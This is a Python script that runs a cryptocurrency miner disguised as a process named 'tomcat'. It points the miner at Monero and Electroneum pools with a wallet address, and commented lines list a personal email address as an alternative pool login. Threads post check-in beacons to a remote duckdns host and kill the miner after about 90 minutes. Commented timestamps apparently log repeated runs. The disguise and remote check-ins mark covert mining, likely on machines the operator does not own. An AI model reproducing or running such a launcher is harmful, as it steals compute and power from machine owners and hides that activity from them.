import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:49:03.653596
#2018-02-17 17:37:04.014849
#2018-02-17 19:25:04.360718
#2018-02-17 21:15:01.578194
#2018-02-17 22:58:05.788413
#2018-02-18 00:44:05.425417
#2018-02-18 02:33:04.460415
#2018-02-18 04:20:04.126742
#2018-02-18 06:11:05.965666
#2018-02-18 08:00:07.782480
#2018-02-18 09:48:07.143343
#2018-02-18 11:35:06.085791
#2018-02-18 13:20:04.506955
#2018-02-18 15:10:08.514942
#2018-02-18 16:58:04.444415
#2018-02-18 18:46:07.074455
#2018-02-18 20:33:03.905218
#2018-02-18 22:19:06.047650
#2018-02-19 00:08:06.183871
#2018-02-19 01:54:07.216063
#2018-02-19 03:41:08.190561
#2018-02-19 05:26:04.052872
#2018-02-19 07:16:07.212899
#2018-02-19 09:04:06.060362
#2018-02-19 10:51:06.340142
#2018-02-19 12:39:04.017255
#2018-02-19 14:26:06.646618
#2018-02-19 16:15:08.747673
#2018-02-19 18:02:02.138955
#2018-02-19 19:48:04.249714
#2018-02-19 21:35:07.250236
#2018-02-19 23:21:01.608065
#2018-02-20 01:07:07.246506
#2018-02-20 02:57:02.278689
#2018-02-20 04:44:07.559010
#2018-02-20 06:28:04.802624
#2018-02-20 08:12:06.668814
#2018-02-20 09:57:05.282001
#2018-02-20 11:41:04.774901
#2018-02-20 13:28:06.411903
#2018-02-20 15:12:01.659721
#2018-02-20 16:58:05.127056
#2018-02-20 18:47:11.435336
#2018-02-20 20:40:10.863191
#2018-02-20 22:26:04.788449
#2018-02-21 00:08:03.865816
#2018-02-21 01:55:01.457455
#2018-02-21 03:43:06.277179
#2018-02-21 05:30:05.088946
#2018-02-21 07:18:05.418185
#2018-02-21 09:03:02.089027
#2018-02-21 10:51:05.018454
#2018-02-21 12:39:01.933542
#2018-02-21 14:26:06.940952
#2018-02-21 16:12:08.683929
#2018-02-21 18:04:06.896757
#2018-02-21 19:52:01.892174
#2018-02-21 21:38:06.168673
#2018-02-21 23:26:05.937102
#2018-02-22 01:16:08.842395
#2018-02-22 03:05:04.173198
#2018-02-22 04:51:02.159459
#2018-02-22 06:36:06.989048
#2018-02-22 08:23:07.372873
#2018-02-22 10:10:10.149855
#2018-02-22 11:54:04.025656
#2018-02-22 13:38:06.883954
#2018-02-22 15:26:07.130270
#2018-02-22 17:13:02.078745
#2018-02-22 18:59:05.378915
#2018-02-22 20:51:03.920892
#2018-02-22 22:38:02.143704
#2018-02-23 00:26:01.877072
#2018-02-23 02:13:07.058457
#2018-02-23 03:56:07.756695
#2018-02-23 05:44:05.936861
#2018-02-23 07:34:01.286085
#2018-02-23 09:37:05.637595
#2018-02-23 11:43:08.326863
#2018-02-23 13:32:01.810079
#2018-02-23 15:19:06.835304
#2018-02-23 17:07:07.863158
#2018-02-23 18:37:07.762359
#2018-02-23 20:19:07.662867
#2018-02-23 21:52:04.085004
#2018-02-23 23:32:05.931471
#2018-02-24 01:05:07.298353
#2018-02-24 02:47:01.427985
#2018-02-24 04:22:05.247687
#2018-02-24 05:50:08.919199
#2018-02-24 07:27:01.595578
#2018-02-24 08:59:07.190090
#2018-02-24 10:47:06.105284
#2018-02-24 12:34:05.047424
#2018-02-24 14:23:07.415415
#2018-02-24 16:11:07.934200
#2018-02-24 18:03:05.685709
#2018-02-24 19:50:06.173320
#2018-02-24 21:34:05.338469
#2018-02-25 00:21:04.904483
#2018-02-25 04:27:01.474506
#2018-02-25 08:08:06.141589